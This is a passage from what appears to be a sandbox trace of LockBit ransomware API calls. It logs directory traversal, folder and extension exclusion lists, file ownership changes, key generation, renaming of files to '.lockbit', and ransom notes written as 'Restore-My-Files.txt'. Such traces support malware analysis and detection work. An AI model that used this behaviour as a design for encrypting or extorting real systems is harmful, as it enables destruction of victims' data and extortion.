lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0081.285] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0081.285] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.285] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0081.286] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0081.286] RtlFreeAnsiString (AnsiString="\\") [0081.286] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0081.286] malloc (_Size=0x200) returned 0x77d800 [0081.286] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0081.286] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.286] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.286] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\title_stripe.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.286] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\title_stripe.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.287] CloseHandle (hObject=0x3c4) returned 1 [0081.287] free (_Block=0x77d800) [0081.287] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\title_stripe.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\title_stripe.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0081.287] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0081.287] malloc (_Size=0x40068) returned 0x1fb18c0 [0081.287] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=3887) returned 1 [0081.287] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.287] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.288] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0081.288] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.288] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.288] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0081.288] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0081.296] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\title_stripe.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\title_stripe.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0081.296] malloc (_Size=0xb2) returned 0x77d800 [0081.296] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0081.297] free (_Block=0x77d800) [0081.297] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\title_stripe.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle") returned 1 [0081.297] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\Restore-My-Files.txt") returned 74 [0081.297] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.297] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fb6b05f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fb6b05f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d170395, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xf2f, dwReserved0=0x0, dwReserved1=0x0, cFileName="title_stripe.png", cAlternateFileName="")) returned 0 [0081.297] FindClose (in: hFindFile=0x55fe78 | out: hFindFile=0x55fe78) returned 1 [0081.297] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa19a729d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7fa6b2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1a3fc59, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="LayeredTitles", cAlternateFileName="LAYERE~1")) returned 1 [0081.297] lstrcmpiW (lpString1=".", lpString2="LayeredTitles") returned -1 [0081.297] lstrcmpiW (lpString1="..", lpString2="LayeredTitles") returned -1 [0081.297] lstrcmpiW (lpString1="LayeredTitles", lpString2="$windows.~bt") returned 1 [0081.297] lstrcmpiW (lpString1="LayeredTitles", lpString2="intel") returned 1 [0081.297] lstrcmpiW (lpString1="LayeredTitles", lpString2="msocache") returned -1 [0081.297] lstrcmpiW (lpString1="LayeredTitles", lpString2="$recycle.bin") returned 1 [0081.297] lstrcmpiW (lpString1="LayeredTitles", lpString2="$windows.~ws") returned 1 [0081.297] lstrcmpiW (lpString1="LayeredTitles", lpString2="tor browser") returned -1 [0081.297] lstrcmpiW (lpString1="LayeredTitles", lpString2="boot") returned 1 [0081.297] lstrcmpiW (lpString1="LayeredTitles", lpString2="system volume information") returned -1 [0081.297] lstrcmpiW (lpString1="LayeredTitles", lpString2="perflogs") returned -1 [0081.297] lstrcmpiW (lpString1="LayeredTitles", lpString2="google") returned 1 [0081.297] lstrcmpiW (lpString1="LayeredTitles", lpString2="application data") returned 1 [0081.297] lstrcmpiW (lpString1="LayeredTitles", lpString2="windows") returned -1 [0081.298] lstrcmpiW (lpString1="LayeredTitles", lpString2="windows.old") returned -1 [0081.298] lstrcmpiW (lpString1="LayeredTitles", lpString2="appdata") returned 1 [0081.298] lstrcmpiW (lpString1="LayeredTitles", lpString2="Windows nt") returned -1 [0081.298] lstrcmpiW (lpString1="LayeredTitles", lpString2="Msbuild") returned -1 [0081.298] lstrcmpiW (lpString1="LayeredTitles", lpString2="Microsoft") returned -1 [0081.298] lstrcmpiW (lpString1="LayeredTitles", lpString2="All users") returned 1 [0081.298] lstrcmpiW (lpString1="LayeredTitles", lpString2="mozilla") returned -1 [0081.298] lstrcmpiW (lpString1="LayeredTitles", lpString2="Microsoft.NET") returned -1 [0081.298] lstrcmpiW (lpString1="LayeredTitles", lpString2="microsoft shared") returned -1 [0081.298] lstrcmpiW (lpString1="LayeredTitles", lpString2="Internet Explorer") returned 1 [0081.298] lstrcmpiW (lpString1="LayeredTitles", lpString2="common files") returned 1 [0081.298] lstrcmpiW (lpString1="LayeredTitles", lpString2="opera") returned -1 [0081.298] lstrcmpiW (lpString1="LayeredTitles", lpString2="Windows Journal") returned -1 [0081.298] wsprintfW (in: param_1=0x3d6b928, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles") returned 58 [0081.298] wsprintfW (in: param_1=0x3d6ad00, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\*") returned 60 [0081.298] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6b120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6b120) returned 0x55fe78 [0081.305] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0081.305] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa19a729d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7fa6b2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1a3fc59, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.305] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0081.305] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0081.305] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70bee7b2, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70bee7b2, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d170395, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x0, dwReserved1=0x0, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0081.305] lstrcmpiW (lpString1=".", lpString2="1047x576black.png") returned -1 [0081.305] lstrcmpiW (lpString1="..", lpString2="1047x576black.png") returned -1 [0081.305] PathFindExtensionW (pszPath="1047x576black.png") returned=".png" [0081.305] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0081.305] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0081.305] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0081.305] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0081.305] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0081.306] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0081.306] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0081.306] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0081.306] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0081.306] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0081.306] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0081.306] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0081.306] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0081.306] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0081.306] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0081.306] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0081.306] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0081.306] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0081.306] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0081.306] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0081.306] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0081.306] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0081.306] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0081.306] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0081.306] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.306] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0081.306] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0081.306] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0081.306] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0081.306] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0081.306] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0081.306] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0081.307] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0081.307] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0081.307] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0081.307] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0081.307] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0081.307] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0081.307] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0081.307] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0081.307] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0081.307] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0081.307] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.307] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0081.307] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0081.307] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0081.307] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0081.307] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="1047x576black.png") returned 1 [0081.307] lstrcmpiW (lpString1="ntldr", lpString2="1047x576black.png") returned 1 [0081.307] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="1047x576black.png") returned 1 [0081.307] lstrcmpiW (lpString1="bootsect.bak", lpString2="1047x576black.png") returned 1 [0081.307] lstrcmpiW (lpString1="autorun.inf", lpString2="1047x576black.png") returned 1 [0081.307] lstrcmpiW (lpString1="thumbs.db", lpString2="1047x576black.png") returned 1 [0081.307] lstrcmpiW (lpString1="iconcache.db", lpString2="1047x576black.png") returned 1 [0081.307] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\") returned="" [0081.307] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\1047x576black.png") returned=".png" [0081.307] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0081.307] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0081.308] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0081.308] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0081.308] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0081.308] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0081.308] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0081.308] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0081.308] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0081.308] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0081.308] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0081.308] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0081.308] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0081.308] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0081.308] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0081.308] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0081.308] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0081.308] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0081.308] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0081.308] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0081.308] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0081.308] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0081.308] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0081.308] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0081.308] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0081.308] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0081.308] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0081.308] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0081.309] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\1047x576black.png.lockbit") returned 84 [0081.309] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\1047x576black.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.310] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0081.310] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0081.310] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.310] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0081.311] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0081.311] RtlFreeAnsiString (AnsiString="\\") [0081.311] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b4) returned 0x0 [0081.311] malloc (_Size=0x200) returned 0x77d800 [0081.311] NtQueryInformationToken (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0081.311] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.311] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.311] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\1047x576black.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.312] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\1047x576black.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.312] CloseHandle (hObject=0x3b4) returned 1 [0081.312] free (_Block=0x77d800) [0081.312] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\1047x576black.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0081.312] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0081.312] malloc (_Size=0x40068) returned 0x1fb18c0 [0081.312] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=4570) returned 1 [0081.312] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.313] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.313] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0081.313] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.314] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.314] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0081.314] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0081.320] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\1047x576black.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\1047x576black.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0081.320] malloc (_Size=0xbe) returned 0x77d800 [0081.320] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xbe, FileInformationClass=0xa) returned 0xc0000008 [0081.321] free (_Block=0x77d800) [0081.321] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\1047x576black.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles") returned 1 [0081.321] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\Restore-My-Files.txt") returned 79 [0081.321] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0081.321] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0081.321] malloc (_Size=0x40068) returned 0x1fb18c0 [0081.321] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fa30f8, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fa30f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0081.324] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70c60bc9, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70c60bc9, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d170395, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb04, dwReserved0=0x0, dwReserved1=0x0, cFileName="203x8subpicture.png", cAlternateFileName="")) returned 1 [0081.324] lstrcmpiW (lpString1=".", lpString2="203x8subpicture.png") returned -1 [0081.324] lstrcmpiW (lpString1="..", lpString2="203x8subpicture.png") returned -1 [0081.324] PathFindExtensionW (pszPath="203x8subpicture.png") returned=".png" [0081.324] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0081.324] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0081.324] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0081.324] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0081.324] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0081.324] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0081.324] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0081.324] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0081.324] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0081.324] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0081.324] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0081.324] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0081.324] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0081.324] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0081.324] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0081.324] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0081.325] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0081.325] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0081.325] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0081.325] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0081.325] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0081.325] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0081.325] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0081.325] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0081.325] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.325] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0081.325] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0081.325] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0081.325] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0081.325] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0081.325] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0081.325] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0081.325] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0081.325] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0081.325] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0081.325] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0081.325] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0081.325] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0081.325] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0081.325] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0081.325] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0081.326] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0081.326] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.326] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0081.326] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0081.326] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0081.326] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0081.326] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="203x8subpicture.png") returned 1 [0081.326] lstrcmpiW (lpString1="ntldr", lpString2="203x8subpicture.png") returned 1 [0081.326] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="203x8subpicture.png") returned 1 